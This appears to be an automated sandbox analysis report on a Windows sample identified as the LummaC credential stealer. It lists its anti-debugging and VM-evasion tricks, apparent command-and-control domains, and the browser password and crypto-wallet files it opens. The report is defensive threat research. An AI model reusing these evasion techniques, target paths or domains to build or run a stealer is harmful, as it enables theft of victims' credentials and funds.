Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C5065C second address: 4C506BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F02B8F275F0h 0x0000000f push eax 0x00000010 jmp 00007F02B8F275EBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov ax, ACABh 0x0000001b movzx ecx, bx 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F02B8F275F8h 0x00000025 mov dword ptr [esp], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C506BB second address: 4C506BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C506BF second address: 4C506C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C506C3 second address: 4C506C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C506C9 second address: 4C5072E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov cx, 6F2Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F02B8F275F8h 0x00000012 push eax 0x00000013 pushad 0x00000014 mov al, bl 0x00000016 call 00007F02B8F275EAh 0x0000001b pop esi 0x0000001c popad 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov cl, 90h 0x00000023 pushfd 0x00000024 jmp 00007F02B8F275EBh 0x00000029 adc ah, 0000006Eh 0x0000002c jmp 00007F02B8F275F9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C507AA second address: 4C507B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C507B0 second address: 4C507B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C507B4 second address: 4C40EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D48Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F032AC3B316h 0x00000011 xor eax, eax 0x00000013 jmp 00007F02B8F06BBAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 cmp eax, 00000000h 0x00000023 setne cl 0x00000026 xor ebx, ebx 0x00000028 test cl, 00000001h 0x0000002b jne 00007F02B8F2D487h 0x0000002d jmp 00007F02B8F2D5FBh 0x00000032 call 00007F02BD7675A0h 0x00000037 mov edi, edi 0x00000039 jmp 00007F02B8F2D48Fh 0x0000003e xchg eax, ebp 0x0000003f jmp 00007F02B8F2D496h 0x00000044 push eax 0x00000045 jmp 00007F02B8F2D48Bh 0x0000004a xchg eax, ebp 0x0000004b pushad 0x0000004c mov bx, cx 0x0000004f movzx ecx, dx 0x00000052 popad 0x00000053 mov ebp, esp 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40EBF second address: 4C40EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F02B8F275F2h 0x0000000a and cx, C918h 0x0000000f jmp 00007F02B8F275EBh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40EE8 second address: 4C40F44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F02B8F2D48Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov bx, 0954h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F02B8F2D493h 0x0000001d jmp 00007F02B8F2D493h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40F44 second address: 4C40F84 instructions: 0x00000000 rdtsc 0x00000002 mov dl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F02B8F275EBh 0x0000000d mov dword ptr [ebp-04h], 55534552h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F02B8F275EBh 0x0000001d jmp 00007F02B8F275F3h 0x00000022 popfd 0x00000023 mov edi, ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40F84 second address: 4C40F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02B8F2D490h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C5D second address: 4C50C7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C7A second address: 4C50C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C80 second address: 4C50C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C84 second address: 4C50CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F02B8F2D498h 0x00000017 jmp 00007F02B8F2D495h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F02B8F2D490h 0x00000023 sbb cx, 9068h 0x00000028 jmp 00007F02B8F2D48Bh 0x0000002d popfd 0x0000002e popad 0x0000002f cmp dword ptr [769B459Ch], 05h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b mov ecx, ebx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50CF6 second address: 4C50CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DC2 second address: 4C50DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DC8 second address: 4C50DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70766 second address: 4C70771 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movsx edx, si 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70771 second address: 4C707BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007F02B8F275F3h 0x0000000b mov ebp, esp 0x0000000d jmp 00007F02B8F275F6h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F02B8F275F7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C707BC second address: 4C707E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D499h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F2D48Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C707E8 second address: 4C7081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov esi, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007F02B8F275EFh 0x00000010 mov esi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F02B8F275F5h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7081C second address: 4C7088A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D491h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f mov cx, 6BAFh 0x00000013 popad 0x00000014 je 00007F032AC0B001h 0x0000001a jmp 00007F02B8F2D492h 0x0000001f cmp dword ptr [769B459Ch], 05h 0x00000026 jmp 00007F02B8F2D490h 0x0000002b je 00007F032AC230B2h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F02B8F2D497h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7088A second address: 4C708E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F275F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F02B8F275ECh 0x00000010 push ecx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F02B8F275F4h 0x0000001d adc al, 00000028h 0x00000020 jmp 00007F02B8F275EBh 0x00000025 popfd 0x00000026 mov esi, 52BD261Fh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C708E6 second address: 4C7090F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D495h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F02B8F2D48Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70A02 second address: 4C70A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70A06 second address: 4C70A1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02B8F2D492h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 42EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 42EC6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5D3A7A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 65B754 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 3813	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 2040	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 3350	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 6480	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6480	Thread sleep time: -116058s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1280	Thread sleep count: 3813 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1280	Thread sleep time: -7629813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4632	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2196	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2828	Thread sleep count: 2040 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2828	Thread sleep time: -4082040s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5448	Thread sleep count: 116 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5448	Thread sleep time: -232116s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1280	Thread sleep count: 3350 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 1280	Thread sleep time: -6703350s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.adobe.dunamis	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\D3DSCache	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\LocalLow\Microsoft	Jump to behavior

Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000002.3299367042.00000000005B5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, file.exe, 00000000.00000003.3295643182.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049219043.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2910063817.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.3302438541.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2749257765.00000000055D0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kyXVZTogEvk0Ug/cTvdVBjxCPm0bNBY/sA3VxFhkhdzQsFcLBz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZ1qMtmQuVsgyJgRjoLosLTOWYnCQQNUD+mHRChOMZhQemhTYAQZgYPXrgAlY7arGVNjsQrU1hANJXXgrvFAvKP9iwWKe4wjrnFHs+Z6n
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.3299367042.00000000005B5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2749257765.00000000055CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: presticitpo.store

Source: file.exe, 00000000.00000002.3300242941.00000000005F8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: EProgram Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271676892.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271814012.0000000000E27000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 5936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000003.2909749635.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe	String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.2909749635.0000000000E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
